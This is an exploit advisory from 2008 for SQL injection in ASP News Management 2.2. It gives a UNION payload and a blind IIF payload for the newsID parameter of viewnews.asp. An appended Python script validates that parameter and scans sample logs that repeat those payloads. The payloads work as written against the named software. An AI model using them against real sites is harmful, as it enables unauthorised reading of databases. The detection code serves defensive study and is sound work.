# Title : Todd Woolums ASP News Management 2.2 SQL Injection Vulnerability
# Published : 2008-06-10
# Author : Bl@ckbe@rD
[+] Script Name : AspNews Remote SQL Injection Exploit
[+] Team : InjEct0r5
[+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
[+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
--//-->
[+] Expl0iT :
/aspnews/viewnews.asp?newsID={SQL}
{SQL} --> 8+union+select+name+from+msysobjects
Or blind it :
{SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00
--//-->
[+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...
# www.Syue.com [2008-06-10]
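
[+] Added example (not part of the original advisory and not the vendor's code): a defensive check that treats newsID as a strict integer and flags viewnews.asp requests that break that rule. The integer-only assumption, the function names and the simplified log layout (client IP, URI stem, URI query, status) are assumptions; the log lines are constructed from the request patterns shown above.

```python
import re
from urllib.parse import unquote_plus

# Assumption: a legitimate newsID is a short decimal integer, nothing else.
VALID_ID = re.compile(r"[0-9]{1,9}")
# Markers taken from the two request patterns shown in this advisory.
MARKERS = ("union", "select", "msysobjects", "iif(", "\x00")

# Constructed sample log: client IP, URI stem, URI query, status.
SAMPLE_LOG = [
    "192.0.2.10 /aspnews/viewnews.asp newsID=8 200",
    "192.0.2.77 /aspnews/viewnews.asp newsID=8+union+select+name+from+msysobjects 500",
    "192.0.2.77 /aspnews/viewnews.asp newsID=IIF((select%20mid(last(Name),1,1)"
    "%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00 200",
    "192.0.2.10 /aspnews/default.asp - 200",
]

def check_news_id(raw):
    """Return (ok, reasons) for a raw, still URL-encoded newsID value."""
    value = unquote_plus(raw)
    if VALID_ID.fullmatch(value):
        return True, []
    lowered = value.lower()
    reasons = [m.replace("\x00", "NUL byte") for m in MARKERS if m in lowered]
    return False, reasons or ["non-numeric"]

def scan_log(lines):
    """Return [(client_ip, reasons)] for viewnews.asp requests with a bad newsID."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3 or not fields[1].lower().endswith("/viewnews.asp"):
            continue
        for pair in fields[2].split("&"):
            name, _, raw = pair.partition("=")
            if name.lower() == "newsid":
                ok, reasons = check_news_id(raw)
                if not ok:
                    hits.append((fields[0], reasons))
    return hits

if __name__ == "__main__":
    for ip, reasons in scan_log(SAMPLE_LOG):
        print(ip, "rejected newsID:", ", ".join(reasons))
```

The same integer-only rule belongs in viewnews.asp itself, applied before the value reaches the query; the log scan only shows who has been probing the parameter.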